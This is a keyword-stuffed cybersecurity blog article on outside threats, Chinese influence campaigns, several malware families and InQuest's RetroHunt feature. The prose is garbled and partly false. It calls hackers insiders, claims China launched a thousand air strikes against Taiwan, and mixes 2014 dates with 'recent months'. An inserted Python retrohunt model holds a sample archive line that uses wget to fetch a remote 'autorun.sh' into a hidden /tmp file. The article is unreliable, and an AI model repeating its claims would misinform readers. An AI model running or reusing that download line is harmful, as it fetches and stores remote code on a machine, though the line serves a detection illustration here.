If you’re a business owner or decision-maker looking to improve your cybersecurity posture, there are several ways to make a lasting impact. One of those methods is an effective adversary-focused approach. It requires collaboration from your organization’s security team as well as from agencies such as the National Security Agency (NSA), the FBI, and others. While these agencies are important for your overall cyber defense, it’s not enough to rely on them alone. Read on to learn more about how an adversary using public hosting exploits emerging threats.
80% of successful attacks originate with external threat agents
One of the simplest and most effective ways to defend your enterprise is to understand and appreciate the difference between inside and outside threats. It might seem like a no-brainer, but if your company is reliant on the Internet for communication, you need to be aware of the dangers.
Internal threats are those that originate from within your walls. These could include employees, contractors, or even the likes of hackers. Typically, insiders have a more personal connection to the data residing on your network. It is also more likely that you will find an employee who is inexperienced with the latest security and network technology.
Targeted attack campaigns in the Philippines and Taiwan
The Chinese government isn’t one to sit back and let the rest of the world do the heavy lifting. Last year, the country made good on its promise to launch a thousand air strikes against Taiwan. To help sway the locals’ opinions, the PRC has rolled out a bevy of information and social media campaigns. Having the requisite data points to draw upon means that the government can make use of some clever tricks.
The flurry of political spying is not limited to the mainland either. The Chinese government has also rolled out several disinformation campaigns, staking claim to a slew of so-called ‘fake news’ websites. These sites often employ social engineering techniques to trick users into clicking on malicious links.
SALITY, DOWNAD/CONFICKER, and GAMARUE malware families
During the second quarter of 2014, several global malware families exploited emerging threats. These new malware families enabled spam campaigns, ransomware scams, and remote control of infected PCs. These attack vectors reveal how attackers are abusing existing public-facing technologies.
QSnatch is one of the most prevalent IoT malware families. It targets QNAP NAS devices, preventing firmware updates and altering scheduled tasks. It uses SSH backdoors to communicate with its command-and-control servers and installs additional malware.
The Slammer worm exploits a buffer overflow bug in Microsoft’s SQL Server and spreads rapidly, causing a denial-of-service condition on some targets. The worm has been a top ten malware family in recent months. This is how an adversary using public hosting exploits emerging threats.
RetroHunting
RetroHunting is a technique used to identify assets at risk, but it is not limited to malware. In fact, the ability to detect and monitor anomalous activity can be an important part of a security team’s arsenal. It can also be useful for identifying attackers before they become public fodder. A tool called RetroHunt can help users find malicious activity in their network or database. The feature is built into InQuest signatures, which makes it a viable solution for organizations that already use InQuest.
InQuest analysts can use this feature to build a robust threat profile by correlating artifacts discovered by the platform with data gathered from other sources. The most important thing to keep in mind is that this feature is only as good as its data. In other words, it is not a substitute for real-time monitoring and response. To take advantage of the feature, it is advisable to set up an InQuest instance. Moreover, a single user can run up to 10 RetroHunt jobs at a time, and the maximum rule size is also restricted to a meager 1MB.
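As an added illustration of the retrohunting idea described above (this is not InQuest’s own code or API; the archive contents, rule format and class names are constructed assumptions), here is a small Python model that applies a newly written rule to previously stored artifacts and enforces the 10-job and 1MB limits mentioned in the text:

```python
"""Minimal retrohunt model: scan an archive of earlier artifacts with a rule
written after they were stored. Hypothetical code, not InQuest's; the job
limit (10 per user) and rule-size cap (1 MB) are taken from the text above,
everything else here is a constructed assumption."""
import re
from dataclasses import dataclass

MAX_JOBS_PER_USER = 10            # per the text: 10 RetroHunt jobs at a time
MAX_RULE_BYTES = 1 * 1024 * 1024  # per the text: 1 MB maximum rule size

# Constructed sample archive: (artifact id, first-seen date, raw content).
ARCHIVE = [
    ("art-001", "2014-04-02", b"GET /update.php?id=7 HTTP/1.1\r\nHost: cdn.example.test"),
    ("art-002", "2014-05-11", b"#!/bin/sh\nwget http://cdn.example.test/autorun.sh -O /tmp/.a"),
    ("art-003", "2014-06-19", b"MZ\x90\x00 benign installer stub"),
]

@dataclass
class Rule:
    name: str
    pattern: bytes  # regex applied to the raw artifact bytes

class RetroHunter:
    """Tracks active jobs per user and scans the archive with one rule."""
    def __init__(self, archive):
        self.archive = archive
        self.running = {}  # user -> number of active jobs

    def submit(self, user, rule):
        if len(rule.pattern) > MAX_RULE_BYTES:
            raise ValueError(f"rule {rule.name} exceeds {MAX_RULE_BYTES} bytes")
        if self.running.get(user, 0) >= MAX_JOBS_PER_USER:
            raise RuntimeError(f"{user} already has {MAX_JOBS_PER_USER} jobs running")
        self.running[user] = self.running.get(user, 0) + 1
        try:
            return self._scan(rule)
        finally:
            self.running[user] -= 1

    def _scan(self, rule):
        regex = re.compile(rule.pattern)
        # Retrospective hits show when behaviour matching a *new* rule first
        # appeared, which real-time detection alone could not have told us.
        return [(aid, seen) for aid, seen, data in self.archive if regex.search(data)]

def find_first_seen(hunter, user, rule):
    """Earliest first-seen date among the rule's hits, or None if no hits."""
    hits = hunter.submit(user, rule)
    return min((seen for _, seen in hits), default=None)
```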
Effective adversary-focused approach to cyber requires coordination across all agencies
Whether your organization is small, mid-sized, or large, an effective adversary-focused approach to cyber requires coordination across all agencies. Government bureaucracies must transform to remove duplicative efforts and move toward real-time collaboration. These innovations can help overcome barriers to an effective cyberthreat response.
Defending against massive cyber attacks requires a coordinated approach. A critical component of this coordination is the alignment of national power, which requires a new set of innovations in government organization and technology. Developing an effective adversary-focused strategy also requires that defenders understand the capabilities and vulnerabilities of the adversary and calibrate their offense and defense standards accordingly.